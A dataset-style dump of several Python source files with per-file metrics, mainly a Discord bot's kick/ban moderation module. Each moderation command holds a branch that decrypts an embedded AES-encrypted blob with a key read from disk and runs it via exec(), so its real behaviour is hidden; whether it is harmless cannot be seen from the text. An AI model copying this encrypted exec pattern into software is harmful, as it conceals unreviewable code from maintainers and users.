| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13638cd8e82580b9ac6648d894afc36ec9feb2a0
| 154
|
py
|
Python
|
dbaas/dbaas/features.py
|
didindinn/database-as-a-service
|
747de31ff8546f7874ddd654af860e130afd17a0
|
[
"BSD-3-Clause"
] | 303
|
2015-01-08T10:35:54.000Z
|
2022-02-28T08:54:06.000Z
|
dbaas/dbaas/features.py
|
nouraellm/database-as-a-service
|
5e655c9347bea991b7218a01549f5e44f161d7be
|
[
"BSD-3-Clause"
] | 124
|
2015-01-14T12:56:15.000Z
|
2022-03-22T20:45:11.000Z
|
dbaas/dbaas/features.py
|
nouraellm/database-as-a-service
|
5e655c9347bea991b7218a01549f5e44f161d7be
|
[
"BSD-3-Clause"
] | 110
|
2015-01-02T11:59:48.000Z
|
2022-02-28T08:54:06.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.conf import settings
LDAP_ENABLED = settings.LDAP_ENABLED
| 19.25
| 56
| 0.785714
| 20
| 154
| 5.65
| 0.7
| 0.212389
| 0.336283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007463
| 0.12987
| 154
| 7
| 57
| 22
| 0.835821
| 0.136364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13648f048fed2c0bae448a3556d07fe8ca1d047f
| 23,034
|
py
|
Python
|
addons/kickban.py
|
jorgev259/Kurisu
|
1405617a2bec2cbe0b51f33d01a5b3a73bf8de15
|
[
"Apache-2.0"
] | null | null | null |
addons/kickban.py
|
jorgev259/Kurisu
|
1405617a2bec2cbe0b51f33d01a5b3a73bf8de15
|
[
"Apache-2.0"
] | null | null | null |
addons/kickban.py
|
jorgev259/Kurisu
|
1405617a2bec2cbe0b51f33d01a5b3a73bf8de15
|
[
"Apache-2.0"
] | 1
|
2018-04-19T01:59:44.000Z
|
2018-04-19T01:59:44.000Z
|
import pyaes
import datetime
import discord
import json
import re
import time
from discord.ext import commands
from sys import argv
class KickBan:
"""
Kicking and banning users.
"""
def __init__(self, bot):
self.bot = bot
print('Addon "{}" loaded'.format(self.__class__.__name__))
@commands.has_permissions(manage_nicknames=True)
@commands.command(pass_context=True, name="kick")
async def kick_member(self, ctx, user, *, reason=""):
"""Kicks a user from the server. Staff only."""
try:
try:
member = ctx.message.mentions[0]
except IndexError:
await self.bot.say("Please mention a user.")
return
if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
with open("key.bin", "rb") as f:
key = f.read(0x20)
cipher = pyaes.AESModeOfOperationCTR(key)
await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
# shitty hack but it works
lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
func = []
cipher = pyaes.AESModeOfOperationCTR(key[::-1])
exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
await func[0]
return
msg = "You were kicked from {}.".format(self.bot.server.name)
if reason != "":
msg += " The given reason is: " + reason
msg += "\n\nYou are able to rejoin the server, but please read the rules in #welcome-and-rules before participating again."
try:
await self.bot.send_message(member, msg)
except discord.errors.Forbidden:
pass # don't fail in case user has DMs disabled for this server, or blocked the bot
self.bot.actions.append("uk:"+member.id)
await self.bot.kick(member)
await self.bot.say("{} is now gone. 👌".format(self.bot.escape_name(member)))
msg = "👢 **Kick**: {} kicked {} | {}#{}\n🏷 __User ID__: {}".format(ctx.message.author.mention, member.mention, self.bot.escape_name(member.name), member.discriminator, member.id)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
await self.bot.send_message(self.bot.serverlogs_channel, msg)
await self.bot.send_message(self.bot.modlogs_channel, msg + ("\nPlease add an explanation below. In the future, it is recommended to use `.kick <user> [reason]` as the reason is automatically sent to the user." if reason == "" else ""))
except discord.errors.Forbidden:
await self.bot.say("💢 I don't have permission to do this.")
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="ban")
async def ban_member(self, ctx, user, *, reason=""):
"""Bans a user from the server. OP+ only."""
try:
try:
member = ctx.message.mentions[0]
except IndexError:
await self.bot.say("Please mention a user.")
return
if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
with open("key.bin", "rb") as f:
key = f.read(0x20)
cipher = pyaes.AESModeOfOperationCTR(key)
await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
# shitty hack but it works
lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
func = []
cipher = pyaes.AESModeOfOperationCTR(key[::-1])
exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
await func[0]
return
msg = "You were banned from {}.".format(self.bot.server.name)
if reason != "":
msg += " The given reason is: " + reason
msg += "\n\nThis ban does not expire."
try:
await self.bot.send_message(member, msg)
except discord.errors.Forbidden:
pass # don't fail in case user has DMs disabled for this server, or blocked the bot
self.bot.actions.append("ub:"+member.id)
await self.bot.ban(member, 0)
await self.bot.say("{} is now b&. 👍".format(self.bot.escape_name(member)))
msg = "⛔ **Ban**: {} banned {} | {}#{}\n🏷 __User ID__: {}".format(ctx.message.author.mention, member.mention, self.bot.escape_name(member.name), member.discriminator, member.id)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
await self.bot.send_message(self.bot.serverlogs_channel, msg)
await self.bot.send_message(self.bot.modlogs_channel, msg + ("\nPlease add an explanation below. In the future, it is recommended to use `.ban <user> [reason]` as the reason is automatically sent to the user." if reason == "" else ""))
except discord.errors.Forbidden:
await self.bot.say("💢 I don't have permission to do this.")
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="silentban", hidden=True)
async def silentban_member(self, ctx, user, *, reason=""):
"""Bans a user from the server, without a notification. OP+ only."""
try:
try:
member = ctx.message.mentions[0]
except IndexError:
await self.bot.say("Please mention a user.")
return
if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
with open("key.bin", "rb") as f:
key = f.read(0x20)
cipher = pyaes.AESModeOfOperationCTR(key)
await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
# shitty hack but it works
lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
func = []
cipher = pyaes.AESModeOfOperationCTR(key[::-1])
exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
await func[0]
return
self.bot.actions.append("ub:"+member.id)
await self.bot.ban(member, 0)
await self.bot.say("{} is now b&. 👍".format(self.bot.escape_name(member)))
msg = "⛔ **Silent ban**: {} banned {} | {}#{}\n🏷 __User ID__: {}".format(ctx.message.author.mention, member.mention, self.bot.escape_name(member.name), member.discriminator, member.id)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
await self.bot.send_message(self.bot.serverlogs_channel, msg)
await self.bot.send_message(self.bot.modlogs_channel, msg + ("\nPlease add an explanation below. In the future, it is recommended to use `.silentban <user> [reason]`." if reason == "" else ""))
except discord.errors.Forbidden:
await self.bot.say("💢 I don't have permission to do this.")
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="timeban")
async def timeban_member(self, ctx, user, length, *, reason=""):
"""Bans a user for a limited period of time. OP+ only.\n\nLength format: #d#h#m#s"""
try:
member = ctx.message.mentions[0]
except IndexError:
await self.bot.say("Please mention a user.")
return
if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
with open("key.bin", "rb") as f:
key = f.read(0x20)
cipher = pyaes.AESModeOfOperationCTR(key)
await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
# shitty hack but it works
lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
func = []
cipher = pyaes.AESModeOfOperationCTR(key[::-1])
exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
await func[0]
return
issuer = ctx.message.author
# thanks Luc#5653
units = {
"d": 86400,
"h": 3600,
"m": 60,
"s": 1
}
seconds = 0
match = re.findall("([0-9]+[smhd])", length) # Thanks to 3dshax server's former bot
if match is None:
return None
for item in match:
seconds += int(item[:-1]) * units[item[-1]]
timestamp = datetime.datetime.now()
delta = datetime.timedelta(seconds=seconds)
unban_time = timestamp + delta
unban_time_string = unban_time.strftime("%Y-%m-%d %H:%M:%S")
with open("data/timebans.json", "r") as f:
timebans = json.load(f)
timebans[member.id] = unban_time_string
self.bot.timebans[member.id] = [member, unban_time, False] # last variable is "notified", for <=30 minute notifications
with open("data/timebans.json", "w") as f:
json.dump(timebans, f)
msg = "You were banned from {}.".format(self.bot.server.name)
if reason != "":
msg += " The given reason is: " + reason
msg += "\n\nThis ban expires {} {}.".format(unban_time_string, time.tzname[0])
try:
await self.bot.send_message(member, msg)
except discord.errors.Forbidden:
pass # don't fail in case user has DMs disabled for this server, or blocked the bot
self.bot.actions.append("ub:"+member.id)
await self.bot.ban(member, 0)
await self.bot.say("{} is now b& until {} {}. 👍".format(self.bot.escape_name(member), unban_time_string, time.tzname[0]))
msg = "⛔ **Time ban**: {} banned {} until {} | {}#{}\n🏷 __User ID__: {}".format(ctx.message.author.mention, member.mention, unban_time_string, self.bot.escape_name(member.name), member.discriminator, member.id)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
await self.bot.send_message(self.bot.serverlogs_channel, msg)
await self.bot.send_message(self.bot.modlogs_channel, msg + ("\nPlease add an explanation below. In the future, it is recommended to use `.timeban <user> <length> [reason]` as the reason is automatically sent to the user." if reason == "" else ""))
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="softban")
async def softban_member(self, ctx, user, *, reason):
"""Soft-ban a user. OP+ only.\n\nThis "bans" the user without actually doing a ban on Discord. The bot will instead kick the user every time they join. Discord bans are account- and IP-based."""
try:
try:
member = ctx.message.mentions[0]
except IndexError:
await self.bot.say("Please mention a user.")
return
if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
with open("key.bin", "rb") as f:
key = f.read(0x20)
cipher = pyaes.AESModeOfOperationCTR(key)
await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
# shitty hack but it works
lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
func = []
cipher = pyaes.AESModeOfOperationCTR(key[::-1])
exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
await func[0]
return
issuer = ctx.message.author
with open("data/softbans.json", "r") as f:
softbans = json.load(f)
if member.id not in softbans:
softbans[member.id] = {}
timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
softbans[member.id] = {"name": "{}#{}".format(member.name, member.discriminator), "issuer_id": issuer.id, "issuer_name": issuer.name, "reason": reason, "timestamp": timestamp}
with open("data/softbans.json", "w") as f:
json.dump(softbans, f)
msg = "This account is no longer permitted to participate in {}. The reason is: {}".format(self.bot.server.name, softbans[member.id]["reason"])
await self.bot.send_message(member, msg)
await self.bot.kick(member)
await self.bot.say("{} is now b&. 👍".format(self.bot.escape_name(member)))
msg = "⛔ **Soft-ban**: {} soft-banned {} | {}#{}\n🏷 __User ID__: {}\n✏️ __Reason__: {}".format(ctx.message.author.mention, member.mention, self.bot.escape_name(member.name), member.discriminator, member.id, reason)
await self.bot.send_message(self.bot.modlogs_channel, msg)
await self.bot.send_message(self.bot.serverlogs_channel, msg)
except discord.errors.Forbidden:
await self.bot.say("💢 I don't have permission to do this.")
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="softbanid")
async def softbanid_member(self, ctx, user_id, *, reason):
"""Soft-ban a user based on ID. OP+ only.\n\nThis "bans" the user without actually doing a ban on Discord. The bot will instead kick the user every time they join. Discord bans are account- and IP-based."""
issuer = ctx.message.author
with open("data/softbans.json", "r") as f:
softbans = json.load(f)
name = "???"
if user_id not in softbans:
softbans[user_id] = {}
elif softbans[user_id]["name"] != "???":
name = softbans[user_id]["name"]
timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
softbans[user_id] = {"name": name, "issuer_id": issuer.id, "issuer_name": issuer.name, "reason": reason, "timestamp": timestamp}
with open("data/softbans.json", "w") as f:
json.dump(softbans, f)
await self.bot.say("ID {} is now b&. 👍".format(user_id))
msg = "⛔ **Soft-ban**: {} soft-banned ID {}\n✏️ __Reason__: {}".format(ctx.message.author.mention, user_id, reason)
await self.bot.send_message(self.bot.modlogs_channel, msg)
await self.bot.send_message(self.bot.serverlogs_channel, msg)
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="unsoftban")
async def unsoftban_member(self, ctx, user_id):
issuer = ctx.message.author
"""Un-soft-ban a user based on ID. OP+ only."""
with open("data/softbans.json", "r") as f:
softbans = json.load(f)
if user_id not in softbans:
await self.bot.say("{} is not soft-banned!".format(user_id))
return
name = softbans[user_id]["name"]
softbans.pop(user_id)
with open("data/softbans.json", "w") as f:
json.dump(softbans, f)
await self.bot.say("{} has been unbanned!".format(self.bot.escape_name(name) if name != "???" else user_id))
msg = "⚠️ **Un-soft-ban**: {} un-soft-banned {}".format(issuer.mention, self.bot.escape_name(name) if name != "???" else "ID {}".format(user_id))
await self.bot.send_message(self.bot.modlogs_channel, msg)
@commands.has_permissions(manage_nicknames=True)
@commands.command()
async def listsoftbans(self, user_id=""):
"""List soft bans. Shows all if an ID is not specified."""
with open("data/softbans.json", "r") as f:
softbans = json.load(f)
embed = discord.Embed(color=discord.Color.dark_red())
if user_id == "":
embed.title = "All soft bans"
for softban in softbans:
# sorry this is garbage
embed.add_field(
name=self.bot.escape_name(softbans[softban]["name"]) if softbans[softban]["name"] != "???" else softban,
value="{}Issuer: {}\nTime: {}\nReason: {}".format(
"" if softbans[softban]["name"] == "???" else "ID: {}\n".format(softban),
self.bot.escape_name(softbans[softban]["issuer_name"]),
softbans[softban]["timestamp"],
softbans[softban]["reason"]
)
)
else:
if user_id in softbans:
embed.title = self.bot.escape_name(softbans[user_id]["name"]) if softbans[user_id]["name"] != "???" else user_id
embed.description = "{}Issuer: {}\nTime: {}\nReason: {}".format(
"" if softbans[user_id]["name"] == "???" else "ID: {}\n".format(user_id),
self.bot.escape_name(softbans[user_id]["issuer_name"]),
softbans[user_id]["timestamp"],
softbans[user_id]["reason"]
)
else:
embed.color = discord.Color.green()
embed.title = user_id
embed.description = "ID is not banned!"
await self.bot.say(embed=embed)
def setup(bot):
bot.add_cog(KickBan(bot))
| 63.629834
| 270
| 0.573066
| 3,287
| 23,034
| 3.96836
| 0.131427
| 0.050981
| 0.041398
| 0.026449
| 0.853726
| 0.819227
| 0.795002
| 0.783349
| 0.765793
| 0.758203
| 0
| 0.069332
| 0.264869
| 23,034
| 361
| 271
| 63.806094
| 0.698931
| 0.022402
| 0
| 0.678679
| 0
| 0.15015
| 0.280471
| 0.162819
| 0
| 0
| 0.00092
| 0
| 0
| 1
| 0.006006
| false
| 0.03003
| 0.024024
| 0
| 0.069069
| 0.003003
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
13665e679c73c201198a789ddfd31eec3b55c213
| 98
|
py
|
Python
|
python/test/run_accuracy_tests.py
|
palmerb4/finufft
|
76f5d8cb688e71f9b80e76d2b13cb3a8a385580d
|
[
"Apache-2.0"
] | 4
|
2022-01-18T21:00:40.000Z
|
2022-02-28T19:12:53.000Z
|
python/test/run_accuracy_tests.py
|
palmerb4/finufft
|
76f5d8cb688e71f9b80e76d2b13cb3a8a385580d
|
[
"Apache-2.0"
] | null | null | null |
python/test/run_accuracy_tests.py
|
palmerb4/finufft
|
76f5d8cb688e71f9b80e76d2b13cb3a8a385580d
|
[
"Apache-2.0"
] | null | null | null |
from accuracy_speed_tests import accuracy_speed_tests
accuracy_speed_tests(100000, 100000, 1e-6)
| 24.5
| 53
| 0.867347
| 15
| 98
| 5.266667
| 0.533333
| 0.493671
| 0.683544
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 0.081633
| 98
| 3
| 54
| 32.666667
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
1374d85a043c0bbb61fa7f828bc19879ca7805a6
| 80
|
py
|
Python
|
src/gmcode/__init__.py
|
marcus7070/gmcode
|
b638e432098ffd9f792fc9fb01a208742d0cd5c4
|
[
"MIT"
] | null | null | null |
src/gmcode/__init__.py
|
marcus7070/gmcode
|
b638e432098ffd9f792fc9fb01a208742d0cd5c4
|
[
"MIT"
] | 2
|
2021-05-17T01:53:35.000Z
|
2021-05-29T05:35:25.000Z
|
src/gmcode/__init__.py
|
marcus7070/gmcode
|
b638e432098ffd9f792fc9fb01a208742d0cd5c4
|
[
"MIT"
] | null | null | null |
from gmcode.machine import Machine, MachineError
from gmcode.geom import Vector
| 26.666667
| 48
| 0.85
| 11
| 80
| 6.181818
| 0.636364
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1125
| 80
| 2
| 49
| 40
| 0.957746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13755885d23f6c93af6330aecaecdf34a140ae31
| 23
|
py
|
Python
|
maha/datasets/functions/__init__.py
|
MuhammadAlBarham/Maha
|
c28e0b7ca69942905548f013a1e35208ef8de7e7
|
[
"BSD-3-Clause"
] | 1
|
2021-11-02T08:25:12.000Z
|
2021-11-02T08:25:12.000Z
|
maha/datasets/functions/__init__.py
|
vikrambala/Maha
|
67020437e745b8fca4770186608326b81073d4b7
|
[
"BSD-3-Clause"
] | null | null | null |
maha/datasets/functions/__init__.py
|
vikrambala/Maha
|
67020437e745b8fca4770186608326b81073d4b7
|
[
"BSD-3-Clause"
] | null | null | null |
from .load_fn import *
| 11.5
| 22
| 0.73913
| 4
| 23
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13787a0037c74e71eac2f84521bfc4c0fdd8d044
| 44
|
py
|
Python
|
datasets/liver_utils.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
datasets/liver_utils.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
datasets/liver_utils.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
import os
import sys
from glob import glob
| 8.8
| 21
| 0.795455
| 8
| 44
| 4.375
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.204545
| 44
| 4
| 22
| 11
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
